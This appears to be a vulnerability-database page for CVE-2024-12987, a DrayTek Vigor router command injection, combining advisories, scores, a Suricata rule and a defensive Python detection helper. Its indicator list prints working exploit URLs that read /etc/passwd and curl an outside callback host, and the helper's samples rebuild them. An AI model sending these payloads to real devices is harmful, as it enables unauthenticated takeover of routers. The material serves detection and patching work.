CVE-2024-12987
Published 2024-12-27
Priority P1 (97) · critical · 9.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · Exploit
CISA Known Exploited Vulnerability, due 2025-06-05
Exploited in the wild
EPSS 98.13% (99.9th percentile)
A vulnerability, which was classified as critical, was found in DrayTek Vigor2960 and Vigor300B 1.5.1.4. Affected is an unknown function of the file /cgi-bin/mainfunction.cgi/apmcfgupload of the component Web Management Interface. The manipulation of the argument session leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.5.1.5 is able to address this issue. It is recommended to upgrade the affected component.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| draytek | vigor2960 | — | — |
| draytek | vigor2960_firmware | — | — |
| draytek | vigor300b | — | — |
| draytek | vigor300b_firmware | — | — |
Detection & IOCs (extracted from sources)
url/cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccat${IFS}/etc/passwd
url/cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccurl${IFS}{{interactsh-url}}
bytes
|b4 25 35 32 24 63 25 35 32 24 63|
suricata
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS DrayTek Gateway Web Management Interface OS Command Injection (CVE-2024-12987)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/mainfunction.cgi/apmcfgupload"; fast_pattern; content:"session|3d|"; content:"|b4 25 35 32 24 63 25 35 32 24 63|"; distance:0; reference:url,nvd.nist.gov/vuln/detail/CVE-2024-12987; reference:cve,2024-12987; classtype:web-application-attack; sid:2059890; rev:1; metadata:affected_product DrayTek, attack_target Server, tls_state TLSDecrypt, created_at 2025_02_05, cve CVE_2024_12987, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2025_02_05, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
- Exploit targets the `session` query parameter of a GET request to `/cgi-bin/mainfunction.cgi/apmcfgupload`. The payload uses `%52$c%52$c` (printf positional `%N$c` conversions) to emit newline/special characters, then appends the shell command with `${IFS}` standing in for spaces so the payload contains no literal whitespace.
- SID 2059890 (written in Suricata sticky-buffer syntax, `http.method`/`http.uri`) fires on a GET to the vulnerable URI whose `session=` is followed by the byte sequence `|b4 25 35 32 24 63 25 35 32 24 63|`, i.e. 0xb4 and then the literal, still percent-encoded `%52$c%52$c`. A payload that lacks the leading 0xb4 byte does not satisfy the rule as written.
- Exposed DrayTek devices can be fingerprinted via FOFA by querying for the `DWS` Server header together with specific JavaScript/language markers.
- A successful exploitation response returns HTTP 200 with the `DWS` Server header and `/etc/passwd` content in the body (match `root:.*:0:0:`).
- Out-of-band (OOB) variant: a second payload issues `curl` to an external callback URL through the same injection point; a DNS or HTTP interaction on the callback confirms blind command execution when no output is returned.
- The vulnerability is unauthenticated (PR:N) and remotely exploitable with no user interaction; the web management interface should not be reachable from the internet.
- The rule metadata sets `tls_state TLSDecrypt` and `deployment SSLDecrypt`: HTTPS management traffic must be decrypted in front of the sensor for the signature to fire.
- Affected firmware: Vigor2960, Vigor300B and Vigor3900 running 1.5.1.4 and earlier; version 1.5.1.5 fixes the issue.
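Added example (not code from the page's sources, DrayTek, Emerging Threats or the Nuclei project): a Python triage helper that applies the indicators above to constructed request lines and a constructed response. It reproduces the sid 2059890 byte match (0xb4 then `%52$c%52$c` after `session=`), runs a looser path-plus-marker heuristic beside it, recovers the injected command by undoing `${IFS}`, and checks a response for the 200 / `DWS` / `root:.*:0:0:` pattern. The sample requests, the callback host `callback.example` and the response body are constructed; as printed on this page the IOC URL has `0.` where the rule expects the 0xb4 byte, so only the heuristic flags that form.

```python
"""Triage helper for CVE-2024-12987 (DrayTek apmcfgupload command injection).

Added example, not code from the page's sources, DrayTek, Emerging Threats or
the Nuclei project. Indicators come from the rule and IOC list above:
  - GET to /cgi-bin/mainfunction.cgi/apmcfgupload with a session= parameter
  - byte 0xb4 followed by the literal "%52$c%52$c" (sid 2059890)
  - successful response: HTTP 200, Server header "DWS", body matching root:.*:0:0:
All sample traffic below is constructed for the demo, not captured.
"""
import re
from urllib.parse import unquote

VULN_PATH = b"/cgi-bin/mainfunction.cgi/apmcfgupload"
RULE_BYTES = bytes.fromhex("b4 25 35 32 24 63 25 35 32 24 63")  # 0xb4 + "%52$c%52$c"
FMT_MARKER = b"%52$c%52$c"
SESSION_RE = re.compile(rb"(?:^|&)session=([^&]*)")
PASSWD_RE = re.compile(r"root:.*:0:0:")


def classify_request(request_line: bytes) -> dict:
    """Score one raw HTTP request line against the published indicators.

    Works on raw bytes on purpose: the IDS rule matches the 0xb4 byte and the
    still percent-encoded "%52$c" in the query, so nothing is decoded first.
    """
    fields = request_line.split(b" ")
    method = fields[0]
    raw_uri = fields[1] if len(fields) > 1 else b""
    path, _, query = raw_uri.partition(b"?")
    session = SESSION_RE.search(query)
    value = session.group(1) if session else b""

    # Mirror sid 2059890: GET, vulnerable URI, "session=" and then (distance:0)
    # the byte sequence somewhere after it.
    rule_fires = (method == b"GET" and path == VULN_PATH and session is not None
                  and RULE_BYTES in query[session.start():])

    # Looser analyst heuristic: vulnerable path plus the format-string marker,
    # regardless of which byte precedes it.
    marker_at = value.find(FMT_MARKER)
    heuristic = path == VULN_PATH and marker_at >= 0

    command = None
    if marker_at >= 0:
        # Everything after the marker is the injected shell command; undo the
        # percent-encoding and the ${IFS} space substitution for readability.
        tail = value[marker_at + len(FMT_MARKER):].decode("latin-1")
        command = unquote(tail).replace("${IFS}", " ")

    return {"path_match": path == VULN_PATH, "rule_2059890": rule_fires,
            "heuristic": heuristic, "command": command}


def classify_response(status: int, headers: dict, body: str) -> dict:
    """Check a response for the success pattern of the cat /etc/passwd probe."""
    server = next((v for k, v in headers.items() if k.lower() == "server"), "")
    leak = PASSWD_RE.search(body) is not None
    return {"status_200": status == 200, "server_dws": "DWS" in server,
            "passwd_leak": leak,
            "exploited": status == 200 and "DWS" in server and leak}


# Constructed samples. #1 follows the IOC URL as printed above ("0." before the
# marker, so the IDS rule does not fire on it); #2 carries the 0xb4 byte the rule
# requires and a hypothetical callback host; #3 is an ordinary request to the path.
SAMPLE_REQUESTS = [
    b"GET " + VULN_PATH + b"?session=" + b"x" * 56
    + b"0.%52$c%52$ccat${IFS}/etc/passwd HTTP/1.1",
    b"GET " + VULN_PATH + b"?session=" + b"x" * 56
    + b"\xb4%52$c%52$ccurl${IFS}http://callback.example/ping HTTP/1.1",
    b"GET " + VULN_PATH + b"?session=abc123 HTTP/1.1",
]
SAMPLE_RESPONSE = (200, {"Server": "DWS", "Content-Type": "text/plain"},
                   "root:x:0:0:root:/root:/bin/sh\nnobody:x:65534:65534:::/bin/false\n")


def triage(requests=SAMPLE_REQUESTS) -> list:
    """Classify a batch of request lines; returns one result dict per request."""
    return [classify_request(r) for r in requests]


if __name__ == "__main__":
    for line, verdict in zip(SAMPLE_REQUESTS, triage()):
        print(line[:60], verdict)
    print(classify_response(*SAMPLE_RESPONSE))
```

The request side deliberately never percent-decodes before matching, because that is how the published rule sees the URI; decoding happens only when reconstructing the injected command for the analyst. Feed `classify_request` the first line of each request from a proxy or web log and `classify_response` the reply to confirm whether the probe actually returned `/etc/passwd`.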
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 4.0 | 6.9 | MEDIUM | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| NVD | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| VulnCheck | — | 6.9 | MEDIUM | — |
| CISA | — | 6.9 | MEDIUM | — |
The 6.9 MEDIUM carried by the CISA and VulnCheck entries matches the CVSS 4.0 base score (VC:L/VI:L/VA:L); the 9.8 CRITICAL shown at the top of this page is the NVD CVSS 3.1 score.
CISA
DrayTek Vigor Routers OS Command Injection Vulnerability
cisa·2025-05-15·CVSS 6.9
CVE-2024-12987 [MEDIUM] CWE-78 DrayTek Vigor Routers OS Command Injection Vulnerability
Vulnerability: DrayTek Vigor Routers OS Command Injection Vulnerability
Affected: DrayTek Vigor Routers
DrayTek Vigor2960, Vigor300B, and Vigor3900 routers contain an OS command injection vulnerability due to an unknown function of the file /cgi-bin/mainfunction.cgi/apmcfgupload of the component web management interface.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://fw.draytek.com.tw/Vigor2960/Firmware/v1.5.1.5/DrayTek_Vigor2960_V1.5.1.5_01release-note.pdf ; https://fw.draytek.com.tw/Vigor300B/Firmware/v1.5.1.5/DrayTek_Vigor300B_V1.5.1.5_01release-note.pdf ; https://fw.draytek.com.tw/Vigor3900/Firmware/v1.5.1.5/DrayTek_Vigor3900_V1.5.1.5
GHSA
GHSA-3mp3-6fg3-7hxj: A vulnerability, which was classified as critical, was found in DrayTek Vigor2960 and Vigor300B 1
ghsa_unreviewed·2024-12-27
CVE-2024-12987 [MEDIUM] CWE-77 GHSA-3mp3-6fg3-7hxj: A vulnerability, which was classified as critical, was found in DrayTek Vigor2960 and Vigor300B 1
A vulnerability, which was classified as critical, was found in DrayTek Vigor2960 and Vigor300B 1.5.1.4. Affected is an unknown function of the file /cgi-bin/mainfunction.cgi/apmcfgupload of the component Web Management Interface. The manipulation of the argument session leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.5.1.5 is able to address this issue. It is recommended to upgrade the affected component.
VulnCheck
DrayTek Vigor Routers OS Command Injection Vulnerability
vulncheck·2024·CVSS 6.9
CVE-2024-12987 [MEDIUM] CWE-78 DrayTek Vigor Routers OS Command Injection Vulnerability
DrayTek Vigor Routers OS Command Injection Vulnerability
DrayTek Vigor2960, Vigor300B, and Vigor3900 routers contain an OS command injection vulnerability due to an unknown function of the file /cgi-bin/mainfunction.cgi/apmcfgupload of the component web management interface.
Affected: DrayTek Vigor Routers
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-02-12&host_type=src&vulnerability=cve-2024-12987; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-02-17&host_type=src&vulnerability=cve-2024-12987; https://dashbo
Suricata
ET WEB_SPECIFIC_APPS DrayTek Gateway Web Management Interface OS Command Injection (CVE-2024-12987)
suricata·2025-02-05·CVSS 6.9
CVE-2024-12987 [MEDIUM] ET WEB_SPECIFIC_APPS DrayTek Gateway Web Management Interface OS Command Injection (CVE-2024-12987)
ET WEB_SPECIFIC_APPS DrayTek Gateway Web Management Interface OS Command Injection (CVE-2024-12987)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS DrayTek Gateway Web Management Interface OS Command Injection (CVE-2024-12987)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/mainfunction.cgi/apmcfgupload"; fast_pattern; content:"session|3d|"; content:"|b4 25 35 32 24 63 25 35 32 24 63|"; distance:0; reference:url,nvd.nist.gov/vuln/detail/CVE-2024-12987; reference:cve,2024-12987; classtype:web-application-attack; sid:2059890; rev:1; metadata:affected_product DrayTek, attack_target Server, tls_state TLSDecrypt, created_at 2025_02_05, cve CVE_2024_12987, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confi
Nuclei
DrayTek Vigor - Command Injection
nuclei·CVSS 6.9
CVE-2024-12987 [MEDIUM] DrayTek Vigor - Command Injection
DrayTek Vigor - Command Injection
DrayTek Gateway devices (Vigor2960, Vigor300B, etc.) are vulnerable to command injection via the session parameter in the /cgi-bin/mainfunction.cgi/apmcfgupload endpoint. An attacker can inject arbitrary commands and retrieve their output.
Template (info section):
```yaml
id: CVE-2024-12987

info:
  name: DrayTek Vigor - Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    DrayTek Gateway devices (Vigor2960, Vigor300B, etc.) are vulnerable to command injection via the session parameter in the /cgi-bin/mainfunction.cgi/apmcfgupload endpoint. An attacker can inject arbitrary commands and retrieve their output.
  impact: |
    Unauthenticated attackers can inject arbitrary system commands through the session parameter in the apmcfgupload endpoint to execute commands
  reference:
    - https://netsecfish.notion.site/Command-Injection-in-apmcfgupload-endpoint-for-DrayTek-Gateway-Devices-1676b683e67c8040b7f1f0ffe29ce18f?pvs=4
    - https://vuldb.com/?ctiid.289380
    - https://vuldb.com/?id.289380
    - https://vuldb.com/?submit.468795
    - https://fw.draytek.com.tw/Vigor2960/Firmware/v1.5.1.5/DrayTek_Vigor2960_V1.5.1.5_01release-note.pdf
    - https://fw.draytek.com.tw/Vigor300B/Firmware/v1.5.1.5/DrayTek_Vigor300B_V1.5.1.5_01release-note.pdf
    - https://fw.draytek.com.tw/Vigor3900/Firmware/v1.5.1.5/DrayTek_Vigor3900_V1.5.1.5_01release-note.pdf
    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-12987
```
Timeline
- 2024-12-27: Published
- 2025-05-15: Added to CISA KEV
- Exploited in the wild